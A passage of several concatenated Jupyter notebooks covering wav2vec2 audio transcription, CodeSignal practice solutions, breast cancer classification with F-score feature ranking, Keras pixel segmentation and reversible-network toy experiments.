print(a)
round(a,4)
# - 7 进阶
# <img src="../Photo/13.png"></img>
# - 8 进阶
# <img src="../Photo/14.png"></img>
a,b = eval(input('>>'))
print(a,b)
print(type(a),type(b))
a = eval(input('>>'))
print(a)
| 7.16(1).ipynb |
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
# ## Import Libraries
import torch
import librosa
import pandas as pd
from pydub import AudioSegment
from transformers import Wav2Vec2ForCTC, Wav2Vec2Tokenizer
# ## Load Pretrained Model
tokenizer = Wav2Vec2Tokenizer.from_pretrained("facebook/wav2vec2-base-960h")
model = Wav2Vec2ForCTC.from_pretrained("facebook/wav2vec2-base-960h")
# ## Load Audio in 16k
audio = AudioSegment.from_file("Audio/audio.flac", "flac")
# ## Length of Each Audio Snippet in ms
# +
time_slice = 20000
upper_bound = int(len(audio)/time_slice)
snip_count = upper_bound + 1
# -
# ## Split Audio File to Smaller Snippets
def SplitClips(audio, time_slice, upper_bound) :
start_time = 0
end_time = start_time + time_slice
for i in range(upper_bound):
audio_snip = audio[start_time:end_time]
audio_snip.export("Audiosnips/audio{0}.flac".format(i), "flac")
start_time = end_time
end_time = end_time + time_slice
audio_snip = audio[end_time:]
audio_snip.export("Audiosnips/audio{0}.flac".format(i+1), "flac")
# ## Transcription to Text File
def transcript_to_text_file(snip_count):
trans = open("transcript_file.txt", mode='a', encoding='utf-8')
for i in range(snip_count):
speech, rate = librosa.load("Audiosnips/audio%d.flac" % i, sr=16000)
input_values = tokenizer(speech, return_tensors='pt').input_values
logits = model(input_values).logits
predicted_ids = torch.argmax(logits, dim=-1)
trans.write(tokenizer.decode(predicted_ids[0]) + " ")
trans.close()
# ## Split and Transcript
SplitClips(audio, time_slice, upper_bound)
# ### Transcript 15min
# %%time
transcript_to_text_file(45)
# ### Transcript 24min
# %%time
transcript_to_text_file(72)
# ## Read Transcripted Text File
file = open("transcript_file.txt", mode='r', encoding='utf-8')
file.read()
file.close()
| large_audio_transcript/Audio_Transcription_to_Text_File.ipynb |
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python 3
# name: python3
# ---
# + [markdown] id="BGjGwPQGgwCe"
# # Century from Year
# Given a year, return the century it is in. The first century spans from the year 1 up to and including the year 100, the second - from the year 101 up to and including the year 200, etc.
#
# Example
#
# For year = 1905, the output should be
# centuryFromYear(year) = 20;
# For year = 1700, the output should be
# centuryFromYear(year) = 17.
# Input/Output
#
# [execution time limit] 4 seconds (py3)
#
# [input] integer year
#
# A positive integer, designating the year.
#
# Guaranteed constraints:
# 1 ≤ year ≤ 2005.
#
# [output] integer
#
# The number of the century the year is in.
# + id="PcbGe_uPgpn_"
from math import ceil
def centuryFromYear(year):
return ceil(year / 100)
# + [markdown] id="loVUQYkIHEuJ"
# # allLongestStrings
#
# Given an array of strings, return another array containing all of its longest strings.
#
# Example
#
# For inputArray = ["aba", "aa", "ad", "vcd", "aba"], the output should be
# allLongestStrings(inputArray) = ["aba", "vcd", "aba"].
# + id="ppLYS5zzHDAr"
def allLongestStrings(inputArray):
longest = 0
result = []
for each in inputArray:
if len(each) > longest:
longest = len(each)
for each in inputArray:
if len(each) == longest:
result.append(each)
return result
# + [markdown] id="JEmaS4fq0f2N"
#
# # commonCharacterCount
# Given two strings, find the number of common characters between them.
#
# Example
#
# For s1 = "aabcc" and s2 = "adcaa", the output should be
# commonCharacterCount(s1, s2) = 3.
#
# Strings have 3 common characters - 2 "a"s and 1 "c".
# + id="kWpf0DV46Kpa"
def commonCharacterCount(s1, s2):
count = 0
for each in set(s1):
if each in s2:
count += min(s1.count(each), s2.count(each))
return count
# + [markdown] id="1VEHxQLopcbq"
# # isLucky
#
# Ticket numbers usually consist of an even number of digits. A ticket number is considered lucky if the sum of the first half of the digits is equal to the sum of the second half.
#
# Given a ticket number n, determine if it's lucky or not.
#
# Example
#
# For n = 1230, the output should be
# isLucky(n) = true;
# For n = 239017, the output should be
# isLucky(n) = false.
# + id="jBSo7INRpXKP"
def isLucky(n):
sum1 = 0
sum2 = 0
mid = len(str(n))//2
for i, v in enumerate(str(n)):
if i < mid:
sum1 += int(v)
else:
sum2 += int(v)
return sum1 == sum2
# + id="L9huFI47q0gv"
def isLucky(n):
n = list(map(int,str(n)))
l = len(n)//2
return sum(n[:l]) == sum(n[l:])
'''
this solution is noteworthy because it uses 'map' to apply the int function
to all elements of of an iterable. Map is still considered O[n] time but
very slightly out performs list comprehension unless called within a lambda.
# + [markdown] id="dAc2cJqtKQtf"
# # sortByHeight
#
# Some people are standing in a row in a park. There are trees between them which cannot be moved. Your task is to rearrange the people by their heights in a non-descending order without moving the trees. People can be very tall!
#
# Example
#
# For a = [-1, 150, 190, 170, -1, -1, 160, 180], the output should be
# sortByHeight(a) = [-1, 150, 160, 170, -1, -1, 180, 190].
# + id="I2tyH4ivKR33"
def sortByHeight(a):
b = []
for i in a:
if i != -1:
b.append(i)
# list comprehension: b = sorted([i for i in a if i != -1])
for i in range(len(a)):
if a[i] != -1:
a[i] = min(b) #if sorted a[i] = b.pop(0)
b.remove(min(b))
return a
# + colab={"base_uri": "https://localhost:8080/", "height": 35} id="sWFgn54JmRPL" outputId="469dc6b8-a351-4e7e-f13c-8d642435159b"
"".join(list('123'))
# + [markdown] id="SLb4nNIPKjEd"
# # alternatingSums
#
# Several people are standing in a row and need to be divided into two teams. The first person goes into team 1, the second goes into team 2, the third goes into team 1 again, the fourth into team 2, and so on.
#
# You are given an array of positive integers - the weights of the people. Return an array of two integers, where the first element is the total weight of team 1, and the second element is the total weight of team 2 after the division is complete.
#
# Example
#
# For a = [50, 60, 60, 45, 70], the output should be
# alternatingSums(a) = [180, 105].
# + id="5D2eXGSpKeFs"
def alternatingSums(a):
w1 = w2 = 0
for i, v in enumerate(a):
if i % 2:
w2 += v
else:
w1 += v
return [w1, w2]
# + [markdown] id="KcGDJUdLPmEy"
# # addBorder
#
# Given a rectangular matrix of characters, add a border of asterisks(*) to it.
#
# Example
#
# For
# <pre><code>picture = ["abc",
# "ded"]
# </code></pre>
#
# the output should be
# <pre><code>addBorder(picture) = ["*****",
# "*abc*",
# "*ded*",
# "*****"]
# </code></pre>
# + id="00eukF1IPkrO"
def addBorder(p):
for each in range(len(p)):
p[each] = "*"+p[each]+"*"
p.insert(0,'*'*(len(p[0])))
p.append('*'*(len(p[0])))
return p
# + [markdown] id="n1GC2Ji6TRn7"
# # */2 areSimilar
#
# Two arrays are called similar if one can be obtained from another by swapping at most one pair of elements in one of the arrays.
#
# Given two arrays a and b, check whether they are similar.
#
# Example
#
# For a = [1, 2, 3] and b = [1, 2, 3], the output should be
# areSimilar(a, b) = true.
#
# The arrays are equal, no need to swap any elements.
#
# For a = [1, 2, 3] and b = [2, 1, 3], the output should be
# areSimilar(a, b) = true.
#
# We can obtain b from a by swapping 2 and 1 in b.
#
# For a = [1, 2, 2] and b = [2, 1, 1], the output should be
# areSimilar(a, b) = false.
#
# Any swap of any two elements either in a or in b won't make a and b equal.
# + id="pgMxB7bxTQB_"
def areSimilar(a, b):
if a == b:
return True
for i in range(len(a)):
for j in range(i+1, len(a)):
a[i], a[j] = a[j], a[i]
if a == b:
return True
a[i], a[j] = a[j], a[i]
return False
### works but O[n**2] time complexity
# + id="9ZLSOubdhsaK"
def areSimilar(a, b):
if a == b:
return True
for i in range(len(a)):
for j in range(i+1, len(a)):
a[i], a[j] = a[j], a[i]
if a == b:
return True
a[i], a[j] = a[j], a[i]
return False
#Fails time constraint.
#*
def areSimilar(a, b):
same_items = sorted(a) == sorted(b)
differences = [i for i in range(len(a)) if a[i] != b[i]]
return len(differences) <= 2 and same_items
#Elegant
# + [markdown] id="p_9IET-LNeEu"
# ## *rectangleRotation
#
# <div class="-flex -scroll -padding-16 -space-v-16"><div class="-layout-h -space-h-16"><div class="-layout-h -space-h-4 -center-center"><div class="icon -size-16 -color-green"><div class="-layout-h -center"><svg width="12" height="14" viewBox="0 0 12 14"><path d="M6 2.28S4.02 4.672 0 6.99v2.647s4.5-2.875 6.01-4.764C7.56 6.778 12 9.637 12 9.637V6.991C7.98 4.608 6 2.28 6 2.28z"></path><path d="M6 5.643s-1.98 2.392-6 4.711V13s4.5-2.875 6.01-4.763C7.56 10.142 12 13 12 13v-2.646c-4.02-2.383-6-4.71-6-4.71v-.001z"></path></svg></div></div><p class="-bold -font-size-14 -capitalize">medium</p></div><div class="-layout-h -space-h-4 -center-center"><div class="icon -size-16 -color-green"><div class="-layout-h -center"><svg width="16" height="16" viewBox="0 0 16 16"><path fill-rule="evenodd" clip-rule="evenodd" d="M8 16A8 8 0 1 1 8 0a8 8 0 0 1 0 16zm-1.43-3c-1.642-.344-2.462-1.136-2.462-2.376V9.612c0-.688-.37-1.032-1.108-1.032V7.42c.739 0 1.108-.346 1.108-1.037V5.31c.013-.613.225-1.11.636-1.487.414-.378 1.023-.653 1.825-.823L7 3.9c-.574.163-.873.621-.896 1.374v1.109c0 .763-.421 1.301-1.265 1.615.844.313 1.265.853 1.265 1.62v1.103c.023.753.322 1.211.896 1.374L6.57 13zm2.86 0c1.642-.344 2.462-1.136 2.462-2.376V9.612c0-.688.37-1.032 1.108-1.032V7.42c-.739 0-1.108-.346-1.108-1.037V5.31c-.013-.613-.225-1.11-.636-1.487-.414-.378-1.023-.653-1.825-.823L9 3.9c.574.163.873.621.896 1.374v1.109c0 .763.421 1.301 1.265 1.615-.844.313-1.265.853-1.265 1.62v1.103c-.023.753-.322 1.211-.896 1.374l.43.905z"></path></svg></div></div><p class="-bold -font-size-14 -capitalize">codewriting</p></div><div class="-layout-h -space-h-4 -center-center"><div class="icon -size-16 -color-green"><div class="-layout-h -center"><svg width="16" height="16" viewBox="0 0 16 16"><path d="M13.33 6.1l-2.8.395-.477 1.58 2.004-.22L11.03 9.6l-1.476.13L8 14.876 6.425 9.73 4.948 9.6 3.923 7.854l2.003.22-.454-1.58-2.8-.396-1.318-2.075 5.53 1.01L8 9.548l1.117-4.51 5.53-1.012L13.33 6.1zM0 8c0 4.418 3.582 8 8 8 4.42 0 8-3.582 8-8 0-4.42-3.58-8-8-8-4.418 0-8 3.58-8 8z" fill-rule="evenodd"></path></svg></div></div><p class="-bold -font-size-14 -capitalize">300</p></div></div><div class="markdown -arial"><p>A rectangle with sides equal to even integers <code>a</code> and <code>b</code> is drawn on the Cartesian plane. Its center (the intersection point of its diagonals) coincides with the point <code>(0, 0)</code>, but the sides of the rectangle are not parallel to the axes; instead, they are forming <code>45</code> degree angles with the axes.</p>
# <p>How many points with integer coordinates are located inside the given rectangle (including on its sides)?</p>
# <p><span class="markdown--header" style="color:#2b3b52;font-size:1.4em">Example</span></p>
# <p>For <code>a = 6</code> and <code>b = 4</code>, the output should be<br>
# <code>rectangleRotation(a, b) = 23</code>.</p>
# <p>The following picture illustrates the example, and the <code>23</code> points are marked green.</p>
# <p><img src="https://codesignal.s3.amazonaws.com/tasks/rectangleRotation/img/rectangle.png?_tm=1582083113018" alt=""></p>
# <p><span class="markdown--header" style="color:#2b3b52;font-size:1.4em">Input/Output</span></p>
# <ul>
# <li>
# <p><strong>[execution time limit] 4 seconds (py3)</strong></p>
# </li>
# <li>
# <p><strong>[input] integer a</strong></p>
# <p>A positive even integer.</p>
# <p><em>Guaranteed constraints:</em><br>
# <code>2 ≤ a ≤ 50</code>.</p>
# </li>
# <li>
# <p><strong>[input] integer b</strong></p>
# <p>A positive even integer.</p>
# <p><em>Guaranteed constraints:</em><br>
# <code>2 ≤ b ≤ 50</code>.</p>
# </li>
# <li>
# <p><strong>[output] integer</strong></p>
# <p>The number of inner points with integer coordinates.</p>
# </li>
# </ul>
# <p><strong>[Python 3] Syntax Tips</strong></p>
# <pre><code class="language-python"><span class="hljs-comment"># Prints help message to the console</span>
# <span class="hljs-comment"># Returns a string</span>
# <span class="hljs-function"><span class="hljs-keyword">def</span> <span class="hljs-title">helloWorld</span>(<span class="hljs-params">name</span>):</span>
# print(<span class="hljs-string">"This prints to the console when you Run Tests"</span>)
# <span class="hljs-keyword">return</span> <span class="hljs-string">"Hello, "</span> + name
#
# </code></pre>
# </div></div>
# + id="jrqrERVxNbQK"
def rectangleRotation(a, b):
import numpy as np
count = 0
a1 = a//2
b1 = b//2
for val1 in range(-a1-5,a1+5):
for val2 in range(-b1-5,b1+5):
if abs(val1*(np.sqrt(2))) <= a1 and abs(val2*(np.sqrt(2))) <= b1:
count += 1
for val1 in range(-a1-(a1%2)-101,a1+(a1%2)+101,2):
for val2 in range(-b1-(b1%2)-101,b1+(b1%2)+101,2):
if abs(0.5*val1*(np.sqrt(2))) <= a1 and abs(0.5*val2*(np.sqrt(2))) <= b1:
count += 1
return count
| CS/CodeSignal_Intro.ipynb |
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
# +
import pandas as pd
import numpy as np
import matplotlib.pyplot as plt
import seaborn as sns
import matplotlib.style
import matplotlib as mpl
# +
wbcd = pd.read_csv('./data/breast-cancer-wisconsin.data.csv')
print(wbcd.shape,'\n')
wbcd['diagnosis'] = wbcd['diagnosis'].astype('int64')
print('Data types :\n', wbcd.dtypes,'\n')
col_names = list(wbcd.columns)
print('column Names = ', col_names, '\n')
# -
np.where(wbcd.isnull())
# Check for missing values in dataframe
wbcd.isnull().sum()
wbcd['bare nucleoi'].describe()
wbcd['bare nucleoi'].value_counts()
wbcd[wbcd['bare nucleoi'] == "?"]
# +
# Data cleaning, drop unnecessary columns id and Unnamed: 32
wbcd.drop(['id'], axis = 1, inplace = True)
wbcd.head()
# -
wbcd['diagnosis'].value_counts()
wbcd['bare nucleoi'].replace("?", np.NAN, inplace=True)
wbcd = wbcd.dropna()
wbcd['bare nucleoi'] = wbcd['bare nucleoi'].astype('int64')
type(wbcd)
wbcd['diagnosis']
wbcd['bare nucleoi'].value_counts()
wbcd['diagnosis'] = wbcd['diagnosis']/2-1
wbcd['diagnosis'].value_counts()
X = wbcd.drop(['diagnosis'], axis =1)
X_col = X.columns
# ### F-Score
# Split data in 70-30 partition
from sklearn.model_selection import train_test_split
X_train, X_test, y_train, y_test = train_test_split(wbcd, wbcd['diagnosis'], test_size = 0.3, random_state = 99)
X_train
Xtrain_p = X_train[y_train == 1]
Xtrain_n = X_train[y_train == 0]
# +
n_pos = Xtrain_p.shape[0]
n_neg = Xtrain_n.shape[0]
print('train malignant (n+):', n_pos)
print('train benign (n-):', n_neg)
# -
x_mean = X_train.mean()
xp_mean = Xtrain_p.mean()
xn_mean = Xtrain_n.mean()
print('x_mean :\n',x_mean,'\n')
print('x+_mean :\n',xp_mean,'\n')
print('x-_mean :\n',xn_mean,'\n')
# +
# FS_num = []
# FS_deno = []
F_Score = np.zeros(len(X_col))
for i in range(len(X_col)):
FS_num = (xp_mean[i] - x_mean[i])**2 + (xn_mean[i] - x_mean[i])**2
FS_den = (sum((Xtrain_p[X_col[i]] - xp_mean[i])**2))/(n_pos-1) + (sum((Xtrain_n[X_col[i]]-xn_mean[i])**2))/(n_neg-1)
F_Score[i] = FS_num/FS_den
# -
F_Score
np.argsort(F_Score)[::-1]+1
# ## Models
from sklearn.neighbors import KNeighborsClassifier
# +
from sklearn.model_selection import cross_val_score
for k in range(1, 40, 2):
# only odd numbers
knn = KNeighborsClassifier(n_neighbors = k, weights='distance')
score = cross_val_score(knn, X_train, y_train, cv =5) #scoring = 'accuracy'
print('k=', k, '; Mean accuracy', score.mean().round(3), ';Std:', score.std().round(3))
# -
#
# #### Chosen parameter k = 9
# +
from sklearn import metrics
from sklearn.linear_model import LogisticRegression
from sklearn.neural_network import MLPClassifier
KNN_score = []
lr_score = []
NN_score = []
model_seq = np.array([2, 6, 3, 7, 1, 8, 4, 5, 9])-1
for i in range(len(model_seq)):
print('\nModel number: ', i+1)
xM_train=X_train[X_col[model_seq[0:i+1]]]
xM_test=X_test[X_col[model_seq[0:i+1]]]
# K-NN method
knn = KNeighborsClassifier(n_neighbors = 9, weights='distance')
knn.fit(xM_train,y_train)
y_knn_pred = knn.predict(xM_test)
mscore= metrics.accuracy_score(y_test, y_knn_pred).round(4)
KNN_score.append(mscore)
# print('metric score for KNN = ', mscore)
cm = metrics.confusion_matrix(y_test, y_knn_pred)
wbcd_cm = pd.DataFrame(data = cm, columns = ['predict: Benign', 'predict: Malignant'],
index = ['true: Benign', 'true: Malignant'])
print(wbcd_cm)
# Logistic Regression method
lr = LogisticRegression(solver='lbfgs') #instantiate the model-step 1
lr.fit(xM_train,y_train)
y_lr_pred = lr.predict(xM_test)
m_score= metrics.accuracy_score(y_test, y_lr_pred).round(4)
lr_score.append(m_score)
# print('metric score for lr = ', m_score)
# Neural Network
clf = MLPClassifier(solver='lbfgs', alpha=1e-3, hidden_layer_sizes=(5, 5, 5, 5))
clf.fit(xM_train, y_train)
y_NN_pred = clf.predict(xM_test)
m_NN_score= metrics.accuracy_score(y_test, y_NN_pred).round(4)
NN_score.append(m_NN_score)
# print('metric score for NN = ',m_NN_score)
from tabulate import tabulate
print(tabulate(np.transpose([KNN_score, lr_score, NN_score]), headers=['K-NN', 'Log-Reg', 'NN']))
# +
# xM5_train = X_train[X_col[model_seq[0:5+1]]]
# xM5_test = X_test[X_col[model_seq[0:5+1]]]
# knn = KNeighborsClassifier(n_neighbors = 9, weights='distance')
# knn.fit(xM5_train,y_train)
# y_pred = knn.predict(xM5_test)
# cm = metrics.confusion_matrix(y_test, y_pred)
# cm
# +
# import statsmodels.formula.api as smf
# result = smf.ols(formula = 'np.log(sales) ~ TV', data = wbcd).fit()
# print(result.summary())
# +
# from sklearn.linear_model import LogisticRegression
# +
# lr = LogisticRegression(solver='lbfgs') #instantiate the model-step 1
# xM_train=X_train[X_col[model_seq[0:1+1]]]
# xM_test=X_test[X_col[model_seq[0:1+1]]]
# lr.fit(xM_train,y_train)
# y_pred = lr.predict(xM_test)
# m_score= metrics.accuracy_score(y_test, y_pred).round(4)
# print(m_score)
# +
# from sklearn.neural_network import MLPClassifier
# clf = MLPClassifier(solver='lbfgs', alpha=1e-3, hidden_layer_sizes=(5, 2))
# xM_train=X_train[X_col[model_seq[0:2+1]]]
# xM_test=X_test[X_col[model_seq[0:2+1]]]
# clf.fit(xM_train, y_train)
# +
# y_pred = clf.predict(xM_test)
# m_score= metrics.accuracy_score(y_test, y_pred).round(4)
# print(m_score)
| WBCD_with_FScore/WBCD_With_FScore.ipynb |
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python 3
# name: python3
# ---
# + colab={"base_uri": "https://localhost:8080/"} id="4Fefev6qnCPS" outputId="ff2ad574-cf75-4386-b3d3-f187a8c6aa14"
# %tensorflow_version 2.x
import tensorflow as tf;
print("GPU device name:",tf.test.gpu_device_name())
print("Num GPUs Available: ", len(tf.config.experimental.list_physical_devices('GPU')))
# + colab={"base_uri": "https://localhost:8080/", "height": 113} id="xRSnZ12XUie4" outputId="c8e2b64f-b70a-47d1-d330-b6492e0d22aa"
#import tensorflow as tf;
import matplotlib.pyplot as plt
import tensorflow.keras as keras
from tensorflow.keras.models import Sequential
from tensorflow.keras.layers import Dense #this layer will be densely connected
import cv2;#import the openCV module
import math;
import random;
import sys;
import numpy as np#for array/matrix calculations
from matplotlib import pyplot as plt #for plotting graphs
#to show the graph figure in the jupyter notebook (show it underneath this code)
# %matplotlib inline
orgimg=cv2.imread('pyramid2.jpeg')#training image
img=cv2.cvtColor(orgimg,cv2.COLOR_BGR2RGB);
orgimg_label=cv2.imread('pyramid2_label.jpeg')#training labels
img_label=cv2.cvtColor(orgimg_label,cv2.COLOR_BGR2RGB);
org_test_img=cv2.imread('pyramid1.jpeg')#test image
img_test=cv2.cvtColor(org_test_img,cv2.COLOR_BGR2RGB);
plt.subplot(131);plt.imshow(img);plt.title('training');plt.axis('off')
plt.subplot(132);plt.imshow(img_label);plt.title('labels');plt.axis('off');
plt.subplot(133);plt.imshow(img_test);plt.title('testing');plt.axis('off');
plt.show()
# + id="Zca1LkIJVlBV"
#load the training data
width=img.shape[1];height=img.shape[0];
No_training_samples=30000;
training_data=np.zeros([No_training_samples,3]);
#note: I used 3 outputs instead of 1 (i.e. separate the r,g,b)
training_label=np.zeros([No_training_samples,3]);
for i in range(No_training_samples):
rx=int(random.random()*width);
ry=int(random.random()*height);
training_data[i]=img[ry,rx]/256;#normalise the data -> in range 0 to 1
if (img_label[ry,rx,0]>200): training_label[i][0]=1;
elif(img_label[ry,rx,1]>200):training_label[i][1]=1;
else:training_label[i][2]=1;
x_train=training_data;
y_train=training_label;
# + colab={"base_uri": "https://localhost:8080/"} id="5c6P-5JkU599" outputId="b70f458c-0bcc-4d5c-bde0-0730b9df7ed1"
#Build the ANN model
model=Sequential() #a model with a series of layers
model.add(Dense(units=1600, activation='relu', input_shape=(3,)))
model.add(Dense(units=1600,activation='relu'))
model.add(Dense(units=3, activation='softmax'))
model.summary() #show the model summary
#compile the model
model.compile(loss='categorical_crossentropy',metrics=['accuracy'])
# + colab={"base_uri": "https://localhost:8080/"} id="XxOcLBROWvcw" outputId="40a118d6-4f8c-4dfe-9a55-3301e28deb4f"
#train the model
history=model.fit(x_train,y_train,epochs=3,verbose=1)
# + id="2zDvnirGaBEn"
#show inference results
def ANN_Segmentation():
#prepare the validation set
validateset=np.zeros([width*height,3]);
j=0;
for y in range(height):
for x in range(width):
validateset[j]=img_test[y,x]/256;
j+=1;
prediction=model.predict(validateset);#perform model prediction
resultimg=img_test.copy(); j=0;
for y in range(height):
for x in range(width):
outputlayer=prediction[j];
j+=1;
if (outputlayer[0]>=outputlayer[1] and outputlayer[0]>=outputlayer[2]):
resultimg[y,x,0]=255;resultimg[y,x,1]=0;resultimg[y,x,2]=0;
elif (outputlayer[1]>outputlayer[0] and outputlayer[1]>=outputlayer[2]):
resultimg[y,x,1]=255;resultimg[y,x,0]=0;resultimg[y,x,2]=0;
else: resultimg[y,x,2]=255;resultimg[y,x,1]=0;resultimg[y,x,0]=0;
return resultimg;
# + colab={"base_uri": "https://localhost:8080/", "height": 511} id="7pCPbeakaDMO" outputId="f2a34965-2e21-4d16-f070-969d2b661d5b"
resultimg=ANN_Segmentation();#segment the image with ANN
#show the results
plt.imshow(img_test);plt.title('original');plt.axis('off');plt.show();
plt.imshow(resultimg);plt.title('segmented');plt.axis('off');plt.show()
| ANN_with_TensorFlow.ipynb |
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
# +
import logging
import importlib
importlib.reload(logging) # see https://stackoverflow.com/a/21475297/1469195
log = logging.getLogger()
log.setLevel('INFO')
import sys
logging.basicConfig(format='%(asctime)s %(levelname)s : %(message)s',
level=logging.INFO, stream=sys.stdout)
# +
# %%capture
import os
import site
os.sys.path.insert(0, '/home/schirrmr/code/reversible/')
os.sys.path.insert(0, '/home/schirrmr/braindecode/code/braindecode/')
os.sys.path.insert(0, '/home/schirrmr/code/explaining/reversible//')
# %load_ext autoreload
# %autoreload 2
import numpy as np
import logging
log = logging.getLogger()
log.setLevel('INFO')
import sys
logging.basicConfig(format='%(asctime)s %(levelname)s : %(message)s',
level=logging.INFO, stream=sys.stdout)
import matplotlib
from matplotlib import pyplot as plt
from matplotlib import cm
# %matplotlib inline
# %config InlineBackend.figure_format = 'png'
matplotlib.rcParams['figure.figsize'] = (12.0, 1.0)
matplotlib.rcParams['font.size'] = 14
import seaborn
seaborn.set_style('darkgrid')
from reversible2.sliced import sliced_from_samples
from numpy.random import RandomState
import torch
import torch.nn as nn
import torch.nn.functional as F
from torch.autograd import Variable
import numpy as np
import copy
import math
import itertools
import torch as th
from braindecode.torch_ext.util import np_to_var, var_to_np
from reversible2.splitter import SubsampleSplitter
from reversible2.view_as import ViewAs
from reversible2.invert import invert
from reversible2.affine import AdditiveBlock
from reversible2.plot import display_text, display_close
# +
import sklearn.datasets
X,y = sklearn.datasets.make_moons(20, shuffle=False, noise=1e-4)
train_inputs = np_to_var(X[0:10:2], dtype=np.float32)
val_inputs = np_to_var(X[1:10:2], dtype=np.float32)
cuda = False
test_X = sklearn.datasets.make_moons(200, shuffle=False, noise=1e-4)[0][:100:2]
test_inputs = np_to_var(test_X, dtype=np.float32)
plt.figure(figsize=(4,4))
plt.scatter(var_to_np(test_inputs)[:,0], var_to_np(test_inputs)[:,1],
color=seaborn.color_palette()[2], alpha=0.5, s=5)
plt.scatter(var_to_np(train_inputs)[:,0], var_to_np(train_inputs)[:,1])
plt.scatter(var_to_np(val_inputs)[:,0], var_to_np(val_inputs)[:,1])
# +
cuda = False
from reversible2.distribution import TwoClassIndependentDist
from reversible2.blocks import dense_add_block
from reversible2.rfft import RFFT, Interleave
from reversible2.util import set_random_seeds
from torch.nn import ConstantPad2d
import torch as th
from reversible2.splitter import SubsampleSplitter
from matplotlib.patches import Ellipse
from reversible2.gaussian import get_gauss_samples
set_random_seeds(2019011641, cuda)
model = nn.Sequential(
dense_add_block(2,200),
dense_add_block(2,200),
dense_add_block(2,200),
dense_add_block(2,200),
)
dist = TwoClassIndependentDist(2, truncate_to=None)
tr_log_stds = (th.zeros_like(train_inputs, requires_grad=True)).detach().clone().requires_grad_(True)
tr_log_stds.data[:] -= 2
from reversible2.model_and_dist import ModelAndDist
model_and_dist = ModelAndDist(model, dist)
optim = th.optim.Adam([{'params': model_and_dist.dist.parameters(), 'lr':1e-2},
{'params': list(model_and_dist.model.parameters()),
'lr': 1e-4}])
optim_stds = th.optim.Adam([{'params': [tr_log_stds], 'lr':1e-2},])
# -
from reversible2.gaussian import get_gaussian_log_probs
in_mean = invert(model_and_dist.model, model_and_dist.dist.get_mean_std(0)[0].unsqueeze(0),).detach()
valid_nll = -get_gaussian_log_probs(in_mean, th.ones_like(in_mean), val_inputs)
valid_nll
# +
from reversible2.invert import invert
n_epochs = 10001
rand_noise_factor = 1e-2
for i_epoch in range(n_epochs):
nll = -th.mean(model_and_dist.get_total_log_prob(0, train_inputs + (th.rand_like(train_inputs) -0.5) * 1e-2))
optim.zero_grad()
nll.backward()
optim.step()
if i_epoch % (n_epochs // 20) == 0:
tr_out = model_and_dist.model(train_inputs)
va_out = model_and_dist.model(val_inputs)
te_out = model_and_dist.model(test_inputs)
demeaned = va_out.unsqueeze(1) - tr_out.unsqueeze(0)
rescaled = demeaned / th.exp(tr_log_stds).unsqueeze(0)
eps = 1e-8
log_probs = -(rescaled **2) / 2 - np.log(float(np.sqrt(2 * np.pi))) - tr_log_stds.unsqueeze(0)
# sum over dimensions
log_probs = th.sum(log_probs, dim=-1)
probs = th.exp(log_probs)
probs = th.mean(probs, dim=1)
log_probs = th.log(probs + eps)
fig = plt.figure(figsize=(5,5))
mean, std = model_and_dist.dist.get_mean_std(0)
plt.plot(var_to_np(te_out)[:,0], var_to_np(te_out)[:,1], color=seaborn.color_palette()[1])
plt.scatter(var_to_np(tr_out)[:,0], var_to_np(tr_out)[:,1], color=seaborn.color_palette()[0])
plt.scatter(var_to_np(va_out)[:,0], var_to_np(va_out)[:,1], color=seaborn.color_palette()[2])
for lprob, out in zip(log_probs, va_out):
plt.annotate("{:.1E}".format(-lprob.item()), var_to_np(out))
ellipse = Ellipse(var_to_np(mean), var_to_np(std[0]), var_to_np(std[1]), edgecolor='black', facecolor='None')
ax = plt.gca()
ax.add_artist(ellipse)
for out, lstd in zip(tr_out, tr_log_stds):
ellipse = Ellipse(var_to_np(out), var_to_np(th.exp(lstd)[0]), var_to_np(th.exp(lstd)[1]),
edgecolor='blue', facecolor='None')
ax.add_artist(ellipse)
plt.title("Epoch {:d} of {:d}\nTrain NLL {:.1E}\nValid NLL {:.1E}\nTest NLL {:.1E}\n"
"ValidMixNLL {:.1E}\n".format(
i_epoch, n_epochs,
-th.mean(model_and_dist.get_total_log_prob(0, train_inputs)).item(),
-th.mean(model_and_dist.get_total_log_prob(0, val_inputs)).item(),
-th.mean(model_and_dist.get_total_log_prob(0, test_inputs)).item(),
-th.mean(log_probs).item(),
))
plt.axis('equal')
display_close(fig)
examples = model_and_dist.get_examples(0,200)
fig = plt.figure(figsize=(5,5))
plt.plot(var_to_np(test_inputs)[:,0], var_to_np(test_inputs)[:,1], color=seaborn.color_palette()[2])
plt.scatter(var_to_np(examples)[:,0], var_to_np(examples)[:,1], color=seaborn.color_palette()[1])
plt.scatter(var_to_np(train_inputs)[:,0], var_to_np(train_inputs)[:,1], color=seaborn.color_palette()[0])
radians = np.linspace(0,2*np.pi,24)
circle_points = np.stack([np.cos(radians), np.sin(radians)], axis=-1)
circle_th = np_to_var(circle_points, device=train_inputs.device, dtype=np.float32)
stds = th.exp(tr_log_stds)
circles_per_point = tr_out.unsqueeze(1) + (circle_th.unsqueeze(0) * stds.unsqueeze(1))
in_circles = invert(model_and_dist.model, circles_per_point.view(-1, circles_per_point.shape[-1]))
in_circles = in_circles.view(circles_per_point.shape)
for c in var_to_np(in_circles):
plt.plot(c[:,0], c[:,1],color=seaborn.color_palette()[0],
alpha=1, lw=1)
plt.axis('equal')
plt.title("Input space")
plt.legend(("Test", "Fake","Train", ),)
display_close(fig)
| notebooks/toy-1d-2d-examples/.ipynb_checkpoints/GaussVsModelled-checkpoint.ipynb |
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
